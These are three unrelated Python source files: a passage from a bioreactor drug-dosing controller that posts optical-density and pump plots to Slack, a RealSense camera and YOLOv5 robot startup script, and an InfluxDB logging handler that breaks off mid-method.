self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
ODfig.savefig("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODplt = None; ODfig = None; fig = None
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
odmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODPlot",
file = file_content
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','vial_drug_mass'
allconcs = allpumps[['vial_drug_mass']]/self.culture_vol
allconcs.rename(columns={'vial_drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='vial_drug_mass',color='tab:orange',legend=False)
DM.set_ylabel('%s Concentration (ug/mL)' % self.drug_name.capitalize())
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
concmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODConc",
file = file_content
)
pumpa = allpumps[['media','drug','waste']]
PUplt,PUax = plt.subplots()
PUax.plot(allODs[['average']], label= 'average', color='tab:blue')
PUax.plot(allODs[['min']], label= '_nolegend_', color = 'tab:grey', linestyle= ':')
PUax.set_ylabel(ylabel='Average OD')
lines, labels = PUax.get_legend_handles_labels()
DM = PUax.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=['tab:orange','tab:red','tab:green'],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUax.legend(lines, labels, loc=2)
# PUplt.axhline(y=self.OD_min, color='tab:grey', linestyle=':')
# PUplt.axhline(y=self.OD_thr, color='tab:grey', linestyle=':')
# PUfig = PUplt.get_figure()
PUplt.savefig("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
PUplt.figure = None; PUplt = None; allconcs= None; colors = None; DM = None; pumpa = None
plt.close('all')
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
pumsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "PUPlot",
file = file_content
)
# THREADS GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['threads']].plot(ax = DM, label='threads',color='tab:purple',legend=False)
DM.set_ylabel(ylabel='Active Threads')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
thrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODThreads",
file = file_content
)
# TEMP GRAPH
if self.temp_sensor:
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['temp']].plot(ax = DM, label='temp',color='tab:pink',legend=False)
DM.set_ylabel(ylabel='Incubator Temperature (C)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
tempmsp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODTemp",
file = file_content
)
# DIL RATE GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allpumps[['dil_rate']].plot(ax = DM, label='dil_rate',color='tab:grey',legend=False)
DM.set_ylabel(ylabel='Dilution Rate (Hz)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); allODs = None; allpumps = None; ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
dilrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODDilR",
file = file_content
)
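# Maintain the "Most recent graphs" thread: on the first pass the plots are
# simply posted there; on later passes the previously posted message and file
# uploads are deleted first and fresh copies posted, so the thread always
# shows only the latest set of graphs.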
if self.firstrec:
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("/%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
# print(self.recod['file']['shares']['public'][self.chanid][0]['ts'])
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
self.firstrec = False
else:
delmsg = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recmes['ts']
)
delod = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recod['file']['shares']['public'][self.chanid][0]['ts']
)
delodc = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recodc['file']['shares']['public'][self.chanid][0]['ts']
)
delrec = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recpu['file']['shares']['public'][self.chanid][0]['ts']
)
delthr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.rethr['file']['shares']['public'][self.chanid][0]['ts']
)
if self.temp_sensor:
deltmp = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.retmp['file']['shares']['public'][self.chanid][0]['ts']
)
deldilr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.redilr['file']['shares']['public'][self.chanid][0]['ts']
)
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
self.thread_locks['graphs'].release()
def dynLimit(self):
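# Dynamic OD threshold: keep short rolling windows (length avefac) of the
# average OD and of its first and second numerical derivatives with respect
# to elapsed hours. Once growth is clearly positive (first derivative above
# OD_err) and flattening out (second derivative below 0.01), lock in the
# current average OD as OD_min and set the dilution threshold OD_thr to
# 1.25 * OD_min.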
self.thread_locks['dynL'].acquire()
self.growthOD.append(self.avOD)
self.growthrate_t.append((self.elapsed_time.total_seconds()/3600))
if len(self.growthOD) == self.avefac:
god_temp = np.diff(self.growthOD)/np.diff(self.growthrate_t)
self.growthrate.append(sum(god_temp)/len(god_temp))
self.growthOD.pop(0)
if len(self.growthrate) < self.avefac:
self.growthrate_t.pop(0)
if len(self.growthrate) == self.avefac:
gr_temp = np.diff(self.growthrate)/np.diff(self.growthrate_t)
self.growthrate2.append(sum(gr_temp)/len(gr_temp))
self.growthrate.pop(0)
self.growthrate_t.pop(0)
if len(self.growthrate2) == self.avefac:
self.instant_gr = sum(god_temp)/len(god_temp)
self.instant_gr2 = sum(gr_temp)/len(gr_temp)
self.growthrate2.pop(0)
if self.instant_gr > self.OD_err and self.instant_gr2 < 0.01:
self.OD_thr_set = True
self.OD_min = self.avOD
self.OD_thr = self.OD_min*1.25
self.thread_locks['dynL'].release()
def control_alg(self):
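# Dispatch on the configured selection algorithm. 'toprak' (presumably named
# after the Toprak et al. morbidostat scheme) pumps waste once OD exceeds
# OD_min, then adds drug if OD is above OD_thr and still higher than at the
# last dilution, otherwise fresh media. 'constant' instead doses drug until
# the vial concentration reaches vial_conc, topping up with media otherwise.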
try:
print_buffer = 0
self.init_pins(self.pin_list)
if self.selection == 'toprak':
if self.avOD > self.OD_min:
self.pump_waste()
if self.avOD > self.OD_thr and self.avOD > self.last_dilutionOD:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
elif self.selection == 'constant':
if self.avOD > self.OD_min:
self.pump_waste()
if self.vial_drug_mass/self.culture_vol < self.vial_conc:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
self.dil_rate_calc()
self.last_dilutionOD = self.avOD
except Exception as e:
print ('[%s] CA - WARNING ADC REQUEST CRASHED' % self.sysstr)
print(e)
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
self.thread_locks['control_alg'].release()
def pump_waste(self):
self.pump_on(self.P_waste_pins)
time.sleep(self.P_waste_times)
self.pump_off(self.P_waste_pins)
self.waste = 3
self.vial_drug_mass = self.vial_drug_mass - (self.vial_drug_mass/self.culture_vol)
def pump_drug(self):
print('[%s] OD Threshold exceeded, pumping %s' % (self.sysstr,self.drug_name))
self.pump_on(self.P_drug_pins)
time.sleep(self.P_drug_times)
self.pump_off(self.P_drug_pins)
self.drug = 2
self.pump_act_times.append(self.P_drug_times)
self.vial_drug_mass = self.vial_drug_mass + self.drug_conc * self.P_drug_times * self.drug_flo_rate
drugamsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping %s. Drug concentration: %f ug/mL" % (self.avOD, self.drug_name, (self.vial_drug_mass)/self.culture_vol)
)
def pump_media(self):
print('[%s] OD below threshold, pumping nutrient' % self.sysstr)
self.pump_on(self.P_nut_pins)
time.sleep(self.P_nut_times)
self.pump_off(self.P_nut_pins)
self.nut = 1
self.pump_act_times.append(self.P_nut_times)
thramgs = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping nutrient. %s concentration: %f ug/mL" % (self.avOD, self.drug_name.capitalize(), (self.vial_drug_mass)/self.culture_vol)
)
def no_pump(self):
self.pump_act_times.append(0)
# self.vial_drug_mass = 0 if self.vial_drug_mass < 0
thrbmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD)
)
def dil_rate_calc(self):
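# Dilution rate = (pump flow rate * last pump-on time) /
# (time between pump events * culture volume), i.e. the fraction of the
# culture volume exchanged per unit time; zero when neither pump fired.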
if len(self.pump_act_times) > 3:
self.pump_act_times.pop(0)
if self.drug == 2:
self.dil_rate = self.drug_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
elif self.nut == 1:
self.dil_rate = self.nut_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
else:
self.dil_rate= 0
# self.dil_rate_smo = self.pump_flo_rate * np.mean(self.pump_act_times)/(self.time_between_pumps * self.culture_vol)
def secondsToText(self,secs):
if secs:
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
else:
return "0 seconds"
def on_timer(self):
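# Scheduler: re-arm a one-shot Timer every time_between_ODs seconds until
# total_time has elapsed, and delegate the per-tick work to thread_split on a
# separate thread (guarded by the 'threads' lock) so a slow iteration cannot
# delay the next tick.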
self.loops += 1
if self.loops < self.total_time/self.time_between_ODs:
threading.Timer(self.time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('[%s] Experiment Complete at %02d:%02d:%02d' % (self.sysstr, self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
compmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second)
)
if self.loops > 1:
if not self.thread_locks['threads'].locked():
self.threads['threads'] = threading.Thread(target=self.thread_split)
self.threads['threads'].start()
else:
self.threads['threads'] = threading.Thread(target=self.thread_split)
self.threads['threads'].start()
def thread_split(self):
self.thread_locks['threads'].acquire()
self.now = datetime.now()
self.nows = time.time()
#print(self.loops)
self.elapsed_time = self.now - self.start_time
self.active_threads = threading.active_count()
# TODO: count loops to see whether a lock has been held for a long time (stalled thread detection)
global i2c_q
global graph_q
if self.loops > 1:
if not self.thread_locks['adc'].locked():
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if not self.thread_locks['dynL'].locked():
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if not self.thread_locks['control_alg'].locked():
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if not self.thread_locks['graphs'].locked():
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
else:
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
# save the data to disk if it's time
if (self.loops % int(self.time_between_saves*60/self.time_between_ODs)) == 0:
if self.printing:
print('[%s] Saving to disk' % self.sysstr)
self.threads['save'] = threading.Thread(target=self.savefunc)
self.threads['save'].start()
else:
if self.printing:
print('[%s] Buffering Data' % self.sysstr)
self.threads['buffer'] = threading.Thread(target=self.bufferdata)
self.threads['buffer'].start()
if self.printing:
print ('[%s] Elapsed Time: %s ; Threads = %d ; OD = %.3f' % (self.sysstr, self.secondsToText(int(self.elapsed_time.total_seconds())),self.active_threads,self.currOD))
self.thread_locks['threads'].release()
chips = IC_init()
threading.Thread(target = i2c_controller).start()
threading.Thread(target = graph_controller).start()
if config['MAIN'].getboolean('temp_sensor'): threading.Thread(target = temp_sensor_func).start()
eve_starter()
threading.Thread(target = live_plotter).start()
# threading.Thread(target = slackresponder).start()
|
main.py
|
"""
main module initializes yolov5,
rs pipeline,
and starts algorithm
"""
from threading import Thread
from time import sleep
import pyrealsense2 as rs
import cv2
import numpy as np
import sys
import torch
from pathlib import Path
import algorithm
from robot import getrobot, set_init_ori
from phoenixutils import valid_pred
import detect
#sys.path.append('yolov5')
robot = getrobot()
set_init_ori(robot)
# initialize object for storing color and depth frames from cameras
storage = detect.ProcessPrediction([416,736]) #should be set automatically
# configure realsense pipeline
pipeline = rs.pipeline()
config = rs.config()
pipeline.start(config)
pipeline_wrapper = rs.pipeline_wrapper(pipeline)
pipeline_profile = config.resolve(pipeline_wrapper)
device = pipeline_profile.get_device()
device_product_line = str(device.get_info(rs.camera_info.product_line))
found_rgb = False
for s in device.sensors:
if s.get_info(rs.camera_info.name) == 'RGB Camera':
found_rgb = True
break
if not found_rgb:
print("The script requires Depth camera with Color sensor")
exit(0)
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30)
if device_product_line == 'L500':
config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)
#else:
# config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
# initialization done
# configure yolov5 inference function
opt = vars(detect.parse_opt())
# set arguments
opt['weights'] = 'yolov5weights/type2_1.2.pt' # model.pt path(s)
opt['source'] = 'realsense' # ROOT / 'data/images', # file/dir/URL/glob, 0 for webcam
opt['imgsz'] = 800 # inference size (pixels)
opt['conf_thres'] = 0.25 # confidence threshold
opt['iou_thres'] = 0.1 # NMS IOU threshold
opt['max_det'] = 2 # maximum detections per image
opt['view_img'] = True
opt['store_prediction'] = storage # False if not to store prediction, ProcessPrediction object if you want to store it
opt['realsense_pipeline'] = pipeline
# run inference on the separated (background) thread
detection_thread = Thread(target=detect.run, kwargs=opt)
detection_thread.start()
# configure and start algorithm
algorithm = algorithm.Algorithm(pipeline, storage, robot)
algorithm.run()
# visualization MIGHT be unused
def visualizeimg(img_source):
while True:
cv2.namedWindow("PhoenixBot", cv2.WINDOW_AUTOSIZE)
#cv2.resizeWindow("PhoenixBot", 800, 600)
print(img_source.anoimg)
cv2.imshow("PhoenixBot", img_source.anoimg)
cv2.waitKey(1000) # wait 1000 ms (1 second) between redraws
visualization_thread = Thread(target=visualizeimg, args=(storage,))
"""
def midpoint_of_line(pts):
return [(pts[0][0]+pts[0][1])/2, (pts[1][0]+pts[1][1])/2]
while True:
frames = pipeline.wait_for_frames()
sleep(1)
if not frames:
print("noframe")
continue
if len(storage.boxes):
for box,cls,conf in zip(storage.boxes, storage.classes, storage.confs):
if int(cls) == 1:
# find coordinates of pixel in depth map
depth_pixel = box[0]
depth_frame = frames.get_depth_frame()
color_frame = frames.get_color_frame()
depthmap_dim = np.asanyarray(depth_frame.get_data()).shape
colormap_dim = np.asanyarray(color_frame.get_data()).shape
color_pixel = [depth_pixel[0]*colormap_dim[1],depth_pixel[1]*colormap_dim[0]]
depth_pixel = [depth_pixel[0] *depthmap_dim[1], depth_pixel[1] *depthmap_dim[0]]
depth_value = np.asanyarray(depth_frame.get_data())[int(depth_pixel[1])][int(depth_pixel[0])]
depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics
depth_point = rs.rs2_deproject_pixel_to_point(depth_intrin, depth_pixel, depth_value)
storage.circle_coords = (int(color_pixel[0]),int(color_pixel[1]))
print(depth_point)
#print(storage.anoimg.shape)
#print(check_imshow())
#print("here")
#cv2.namedWindow("PhoenixBot", cv2.WINDOW_AUTOSIZE)
#print("there")
#cv2.resizeWindow("PhoenixBot", 800, 600)
#print(storage.anoimg)
#cv2.imshow("PhoenixBot", storage.anoimg)
#cv2.waitKey(10)# 1 milliseond
"""
"""
storage.process()
classes = []
midpoint_classes = []
for box in storage.boxes:
classes.append(int(box.cls))
midpoint_classes.append(box.midpoint())
#print(storage.normalize(box.midpoint()))
if len(classes)!=2:
print('Not enough classes detected')
continue
if classes[0] == classes[1]:
print ('Detected two boxes of one class')
continue
else:
depth_pixel = midpoint_of_line(midpoint_classes)
#print(depth_pixel)
depth_frame = frames.get_depth_frame()
#print(np.asanyarray(depth_frame.get_data()).shape)
depth_value = np.asanyarray(depth_frame.get_data())[int(depth_pixel[1])][int(depth_pixel[0])]
depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics
# = 0.5
#depth_pixel = [depth_intrin.ppx, depth_intrin.ppy]
depth_point = rs.rs2_deproject_pixel_to_point(depth_intrin, depth_pixel, depth_value)
#print(depth_point)
"""
"""
try:
while True:
# Wait for a coherent pair of frames: depth and color
frames = pipeline.wait_for_frames()
color_frame = frames.get_color_frame()
if not color_frame:
continue
# Convert images to numpy arrays
color_image = np.asanyarray(color_frame.get_data())
color_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)
except Exception as e:
print(e)
finally:
# Stop streaming
pipeline.stop()
"""
|
handler.py
|
import logging
import queue
import sys
import threading
import traceback
from logging.handlers import BufferingHandler
from queue import Queue
import time
from influxdb import InfluxDBClient
PY3 = sys.version_info[0] == 3
WAN_CHUNK, LAN_CHUNK = 1420, 8154
if PY3:
data, text = bytes, str
else:
data, text = str, unicode
# skip_list is used to filter additional fields in a log message.
# It contains all attributes listed in
# http://docs.python.org/library/logging.html#logrecord-attributes
# plus exc_text, which is only found in the logging module source,
# and id, which is prohibited by the GELF format.
SKIP_ATTRIBUTES = [
'args', 'asctime', 'created', 'exc_text', 'filename',
'funcName', 'id', 'levelname', 'levelno', 'lineno', 'module',
'msecs', 'message', 'msg', 'name', 'pathname', 'process',
'processName', 'stack_info', 'relativeCreated', 'thread', 'threadName'
]
STACKTRACE_ATTRIBUTE = 'exc_info'
DEFAULT_TAGS = {
'filename': 'source.fileName',
'funcName': 'source.methodName',
'levelname': 'level',
'lineno': 'source.lineNumber',
'thread': 'threadId',
'threadName': 'threadName',
'processName': 'processName'
}
DEFAULT_FIELDS = {
'message': 'message',
'msg': 'message'
}
class InfluxHandler(logging.Handler):
"""InfluxDB logging handler
:param database: The database you want log entries to go into.
:param measurement: Replace measurement with specified value. If not specified,
record.name will be passed as `logger` parameter.
:param lazy_init: Enable lazy initialization. Defaults to False.
:param include_fields: Include additional fields. Defaults to {}.
:param include_tags: Include additional tags. Defaults to {}.
:param extra_fields: Add extra fields if found. Defaults to True.
:param extra_tags: Add extra tags if found. Defaults to True.
:param include_stacktrace: Add stacktraces. Defaults to True.
:param exclude_tags: Exclude list of tag names. Defaults to [].
:param exclude_fields: Exclude list of field names. Defaults to [].
:param **influxdb_opts: InfluxDB client options
"""
def __init__(self,
database: str,
measurement: str = None,
retention_policy: str = None,
backpop: bool = True,
lazy_init: bool = False,
include_tags: dict = {},
include_fields: dict = {},
exclude_tags: list = [],
exclude_fields: list = [],
extra_tags: bool = True,
extra_fields: bool = True,
include_stacktrace: bool = True,
**influxdb_opts
):
logging.Handler.__init__(self)
self._measurement = measurement
self._client = InfluxDBClient(database=database, **influxdb_opts)
self._backpop = backpop
self._retention_policy = retention_policy
# extend tags to include
self._include_tags = dict(DEFAULT_TAGS)  # copy so the module-level default is not mutated
self._include_tags.update(include_tags)
# extend fields to include
self._include_fields = dict(DEFAULT_FIELDS)  # copy so the module-level default is not mutated
self._include_fields.update(include_fields)
self._extra_tags = extra_tags
self._extra_fields = extra_fields
self._include_stacktrace = include_stacktrace
self._exclude_tags = exclude_tags
self._exclude_fields = exclude_fields
if lazy_init is False:
if database not in {x['name'] for x in self._client.get_list_database()}:
self._client.create_database(database)
def get_client(self):
return self._client
def emit(self, record):
"""
Emit a record.
Write the record to InfluxDB as one or more points
"""
self._client.write_points(self._get_point(record), retention_policy=self._retention_policy)
def _convert_to_point(self, key, value, fields={}, tags={}):
if value is None:
return
elif isinstance(value, dict):
for k in value:
if key:
self._convert_to_point(key + '.' + k, value[k], fields, tags)
else:
self._convert_to_point(k, value[k], fields, tags)
elif isinstance(value, list):
self._convert_to_point(key, ' '.join(str(v) for v in value), fields, tags)
else:
if key in self._include_tags:
if key not in self._exclude_tags:
tags[self._include_tags.get(key)] = value
elif key in self._include_fields:
if key not in self._exclude_fields:
fields[self._include_fields.get(key)] = value
elif key == STACKTRACE_ATTRIBUTE and self._include_stacktrace:
if isinstance(value, tuple):
# exc_info is defined as a tuple
tags['thrown.type'] = value[0].__name__
fields['thrown.message'] = str(value[1])
fields['thrown.stackTrace'] = ''.join(traceback.format_exception(*value))
elif key in SKIP_ATTRIBUTES:
return
else:
if isinstance(value, int) or isinstance(value, float) or isinstance(value, bool):
if self._extra_fields and key not in self._exclude_fields:
fields[key] = value
else:
if self._extra_tags and key not in self._exclude_tags:
tags[key] = value
def _get_point(self, record):
fields = {}
tags = {}
for record_name, record_value in record.__dict__.items():
# ignore methods
if record_name.startswith('_'):
continue
self._convert_to_point(record_name, record_value, fields, tags)
if self._measurement:
ret = [{
"measurement": self._measurement,
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
}]
elif not self._backpop:
ret = [{
"measurement": record.name.replace(".", ":") or 'root',
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
}]
else:
ret = []
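# With backpop enabled, a dotted logger name is expanded into a chain of
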